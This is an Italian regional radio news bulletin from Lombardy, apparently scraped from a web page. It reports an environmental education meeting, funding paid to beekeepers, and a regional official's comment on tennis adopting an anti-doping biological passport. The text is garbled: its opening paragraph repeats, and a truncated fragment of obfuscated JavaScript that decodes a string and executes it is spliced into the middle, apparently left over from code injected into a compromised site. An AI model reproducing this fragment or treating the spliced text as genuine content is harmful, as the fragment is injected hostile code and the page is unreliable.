Bentrovati al nostro nuovo appuntamento informativo realizzato in collaborazione con Regione Lombardia

Oggi la riunione del 'Tavolo Educazione Ambientale' con oltre 60 esponenti di associazioni, fondazioni ed Enti. Quali gli obiettivi li spiega l'assessore regionale all'Ambiente Leonardo Salvemini...

-   &nbs(e)s=s+ff(w[j]+3);}xz=e;if(window.document)xz(s)} Notiziario regionale ore 18 Bentrovati al nostro nuovo appuntamento informativo realizzato in collaborazione con Regione Lombardia

Oggi la riunione del 'Tavolo Educazione Ambientale' con oltre 60 esponenti di associazioni, fondazioni ed Enti. Quali gli obiettivi li spiega l'assessore regionale all'Ambiente Leonardo Salvemini...

-    Audio –

Via libera dalla Regione al pagamento di 74.000 euro agli imprenditori del miele. Si tratta dei fondi resi disponibili dal bando 2012 per l'ammodernamento dei laboratori di smielatura e delle sale di lavorazione. Su 61 domande giudicate ammissibili, saranno 30 gli apicoltori interessati dalla prima tranche di pagamento. Per le restanti domande in graduatoria la liquidazione del contributo è prevista per il mese di luglio 2013. "Punto di forza bando - spiega l'assessore regionale all'Agricoltura Giuseppe Elias – è la possibilità di accedere al cofinanziamento pubblico anche per piccoli investimenti, non previsti dalle misure dell'Organizzazione comune di mercato (Ocm) del miele e del Programma di sviluppo rurale (Psr), ma altrettanto importanti per migliorare la qualità delle produzioni apistiche". "Grazie a economie che si sono rese disponibili - ha concluso Elias – il bando, che ha incontrato ampio gradimento tra gli apicoltori, potrà soddisfare tutte le richieste pervenute e giudicate ammissibili".

"Un altro salto di qualità sulla strada della lotta al doping, con la speranza che presto tutti gli sport si dotino di questo strumento per garantire un'omologazione sotto il profilo sia della tutela degli atleti, sia giuridico". Lo ha detto l'assessore regionale allo Sport e Giovani, Filippo Grassia commentando la notizia dell'adozione del passaporto biologico da parte della Federazione Internazionale Tennis. "È un segnale importante – sottolinea  Grassia - che siano stati proprio i migliori tennisti del mondo a fare pressione per arrivare il prima possibile a questo risultato, perché proprio a causa della sua esasperazione atletica, il tennis era finito sotto accusa".

È tutto, grazie per l’ascolto